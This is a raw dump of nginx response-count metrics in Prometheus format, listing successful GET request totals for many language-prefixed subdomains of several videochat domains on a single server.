nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="gl.videochat.show"} 20013 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="gl.videochat.tv.br"} 55327 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="gl.videochat.world"} 62281 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="gu.videochat.cafe"} 36771 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="gu.videochat.date"} 19186 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="gu.videochat.mx"} 30126 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="gu.videochat.show"} 18969 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="gu.videochat.tv.br"} 38926 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="gu.videochat.world"} 46261 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="he.videochat.cafe"} 33129 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="he.videochat.date"} 14657 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="he.videochat.mx"} 26492 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="he.videochat.show"} 37317 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="he.videochat.tv.br"} 73420 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="he.videochat.world"} 53178 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="hi.videochat.cafe"} 23580 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="hi.videochat.date"} 16471 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="hi.videochat.mx"} 12783 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="hi.videochat.show"} 16491 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="hi.videochat.tv.br"} 49241 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="hi.videochat.world"} 53593 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="hr.videochat.cafe"} 13689 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="hr.videochat.date"} 15964 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="hr.videochat.mx"} 24423 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="hr.videochat.show"} 22923 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="hr.videochat.tv.br"} 31983 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="hr.videochat.world"} 42234 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ht.videochat.cafe"} 23799 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ht.videochat.date"} 17146 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ht.videochat.mx"} 29112 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ht.videochat.show"} 20082 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ht.videochat.tv.br"} 40580 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ht.videochat.world"} 47132 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="hu.videochat.cafe"} 35777 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="hu.videochat.date"} 20589 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="hu.videochat.mx"} 27399 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="hu.videochat.show"} 31411 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="hu.videochat.tv.br"} 48918 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="hu.videochat.world"} 52825 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="id.videochat.cafe"} 35621 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="id.videochat.date"} 19807 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="id.videochat.mx"} 27128 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="id.videochat.show"} 30594 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="id.videochat.tv.br"} 47033 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="id.videochat.world"} 57221 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="is.videochat.cafe"} 48446 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="is.videochat.date"} 20729 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="is.videochat.mx"} 28293 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="is.videochat.show"} 38861 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="is.videochat.tv.br"} 65446 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="is.videochat.world"} 65147 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="it.videochat.cafe"} 23047 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="it.videochat.date"} 17636 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="it.videochat.mx"} 23178 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="it.videochat.show"} 22750 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="it.videochat.tv.br"} 37497 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="it.videochat.world"} 45967 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="jp.videochat.cafe"} 19017 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="jp.videochat.date"} 14352 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="jp.videochat.mx"} 11041 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="jp.videochat.show"} 26131 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="jp.videochat.tv.br"} 31521 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="jp.videochat.world"} 37552 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="jv.videochat.cafe"} 17812 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="jv.videochat.date"} 21583 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="jv.videochat.mx"} 30593 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="jv.videochat.show"} 27697 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="jv.videochat.tv.br"} 42379 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="jv.videochat.world"} 40178 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ka.videochat.cafe"} 16001 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ka.videochat.date"} 12010 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ka.videochat.mx"} 20227 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ka.videochat.show"} 14409 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ka.videochat.tv.br"} 40699 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ka.videochat.world"} 29805 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="kk.videochat.cafe"} 59657 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="kk.videochat.date"} 17135 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="kk.videochat.mx"} 21018 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="kk.videochat.show"} 22452 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="kk.videochat.tv.br"} 48912 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="kk.videochat.world"} 49753 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="km.videochat.cafe"} 17823 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="km.videochat.date"} 15067 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="km.videochat.mx"} 17565 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="km.videochat.show"} 15413 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="km.videochat.tv.br"} 30268 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="km.videochat.world"} 28215 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="kn.videochat.cafe"} 16258 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="kn.videochat.date"} 17571 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="kn.videochat.mx"} 25022 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="kn.videochat.show"} 18492 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="kn.videochat.tv.br"} 61309 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="kn.videochat.world"} 66313 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ko.videochat.cafe"} 23126 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ko.videochat.date"} 19021 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ko.videochat.mx"} 21050 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ko.videochat.show"} 25521 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ko.videochat.tv.br"} 30473 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ko.videochat.world"} 42219 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ky.videochat.cafe"} 39132 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ky.videochat.date"} 18633 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ky.videochat.mx"} 21678 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ky.videochat.show"} 19690 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ky.videochat.tv.br"} 61051 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ky.videochat.world"} 62328 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="lb.videochat.cafe"} 22697 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="lb.videochat.date"} 19608 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="lb.videochat.mx"} 25611 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="lb.videochat.show"} 24856 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="lb.videochat.tv.br"} 36310 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="lb.videochat.world"} 52168 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="lo.videochat.cafe"} 29697 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="lo.videochat.date"} 15860 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="lo.videochat.mx"} 17809 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="lo.videochat.show"} 22108 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="lo.videochat.tv.br"} 56198 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="lo.videochat.world"} 71113 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="lt.videochat.cafe"} 23778 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="lt.videochat.date"} 19223 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="lt.videochat.mx"} 31857 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="lt.videochat.show"} 33011 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="lt.videochat.tv.br"} 39351 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="lt.videochat.world"} 59649 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="lv.videochat.cafe"} 27821 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="lv.videochat.date"} 18385 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="lv.videochat.mx"} 23630 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="lv.videochat.show"} 22367 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="lv.videochat.tv.br"} 76145 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="lv.videochat.world"} 46217 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mg.videochat.cafe"} 32295 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mg.videochat.date"} 25176 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mg.videochat.mx"} 21883 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mg.videochat.show"} 29928 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mg.videochat.tv.br"} 50266 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mg.videochat.world"} 50758 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mi.videochat.cafe"} 18776 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mi.videochat.date"} 17218 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mi.videochat.mx"} 15285 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mi.videochat.show"} 22823 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mi.videochat.tv.br"} 42647 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mi.videochat.world"} 40059 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mk.videochat.cafe"} 33765 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mk.videochat.date"} 17059 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mk.videochat.mx"} 23771 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mk.videochat.show"} 21633 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mk.videochat.tv.br"} 42026 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mk.videochat.world"} 54213 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ml.videochat.cafe"} 15303 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ml.videochat.date"} 13500 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ml.videochat.mx"} 15693 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ml.videochat.show"} 16380 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ml.videochat.tv.br"} 33724 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ml.videochat.world"} 25316 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mn.videochat.cafe"} 24756 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mn.videochat.date"} 18308 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mn.videochat.mx"} 21062 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mn.videochat.show"} 18635 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mn.videochat.tv.br"} 32273 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mn.videochat.world"} 49663 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mr.videochat.cafe"} 14265 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mr.videochat.date"} 13222 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mr.videochat.mx"} 27881 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mr.videochat.show"} 23919 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mr.videochat.tv.br"} 42159 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mr.videochat.world"} 38690 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mrj.videochat.cafe"} 35816 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mrj.videochat.date"} 31073 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mrj.videochat.mx"} 22526 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mrj.videochat.show"} 27038 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mrj.videochat.tv.br"} 48679 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mrj.videochat.world"} 57356 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ms.videochat.cafe"} 39980 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ms.videochat.date"} 44909 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ms.videochat.mx"} 25891 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ms.videochat.show"} 36112 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ms.videochat.tv.br"} 53029 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ms.videochat.world"} 57148 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mt.videochat.cafe"} 33298 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mt.videochat.date"} 37967 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mt.videochat.mx"} 29119 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mt.videochat.show"} 22667 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mt.videochat.tv.br"} 52030 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="mt.videochat.world"} 52663 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="my.videochat.cafe"} 13464 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="my.videochat.date"} 30131 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="my.videochat.mx"} 18588 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="my.videochat.show"} 23351 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="my.videochat.tv.br"} 36930 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="my.videochat.world"} 42643 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ne.videochat.cafe"} 14049 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ne.videochat.date"} 27632 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ne.videochat.mx"} 242096 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ne.videochat.show"} 17174 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ne.videochat.tv.br"} 34317 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ne.videochat.world"} 27085 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ngydkta.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="nl.videochat.cafe"} 26919 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="nl.videochat.date"} 38631 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="nl.videochat.mx"} 20432 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="nl.videochat.show"} 27040 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="nl.videochat.tv.br"} 38418 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="nl.videochat.world"} 49688 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="no.videochat.cafe"} 21045 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="no.videochat.date"} 42403 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="no.videochat.mx"} 22833 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="no.videochat.show"} 18858 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="no.videochat.tv.br"} 33721 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="no.videochat.world"} 48092 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="pa.videochat.cafe"} 21192 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="pa.videochat.date"} 31114 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="pa.videochat.mx"} 22257 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="pa.videochat.show"} 19265 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="pa.videochat.tv.br"} 55282 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="pa.videochat.world"} 58166 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="pap.videochat.cafe"} 16317 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="pap.videochat.date"} 30138 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="pap.videochat.mx"} 16301 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="pap.videochat.show"} 22700 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="pap.videochat.tv.br"} 32916 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="pap.videochat.world"} 34834 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="pl.videochat.cafe"} 22392 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="pl.videochat.date"} 36468 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="pl.videochat.mx"} 27158 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="pl.videochat.show"} 28173 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="pl.videochat.tv.br"} 39265 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="pl.videochat.world"} 58323 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="pt.videochat.cafe"} 35950 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="pt.videochat.date"} 73102 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="pt.videochat.mx"} 26710 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="pt.videochat.show"} 49645 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="pt.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="pt.videochat.world"} 69594 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ro.videochat.cafe"} 22328 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ro.videochat.date"} 37387 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ro.videochat.mx"} 28671 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ro.videochat.show"} 19433 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ro.videochat.tv.br"} 35057 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ro.videochat.world"} 45901 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="rxwarht.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sco.videochat.cafe"} 36543 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sco.videochat.date"} 30883 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sco.videochat.mx"} 26628 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sco.videochat.show"} 24240 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sco.videochat.tv.br"} 56912 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sco.videochat.world"} 54115 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="si.videochat.cafe"} 24806 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="si.videochat.date"} 36990 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="si.videochat.mx"} 21180 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="si.videochat.show"} 24378 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="si.videochat.tv.br"} 56962 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="si.videochat.world"} 68673 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sitemap.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sitemaps.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sk.videochat.cafe"} 27036 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sk.videochat.date"} 39586 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sk.videochat.mx"} 26803 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sk.videochat.show"} 21944 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sk.videochat.tv.br"} 44738 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sk.videochat.world"} 47963 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sl.videochat.cafe"} 33905 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sl.videochat.date"} 43245 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sl.videochat.mx"} 33258 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sl.videochat.show"} 21184 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sl.videochat.tv.br"} 57566 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sl.videochat.world"} 61701 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sr.videochat.cafe"} 39284 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sr.videochat.date"} 40993 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sr.videochat.mx"} 23643 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sr.videochat.show"} 23357 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sr.videochat.tv.br"} 43645 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sr.videochat.world"} 79378 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="staging.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="su.videochat.cafe"} 19157 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="su.videochat.date"} 41891 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="su.videochat.mx"} 25242 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="su.videochat.show"} 16906 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="su.videochat.tv.br"} 45910 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="su.videochat.world"} 38996 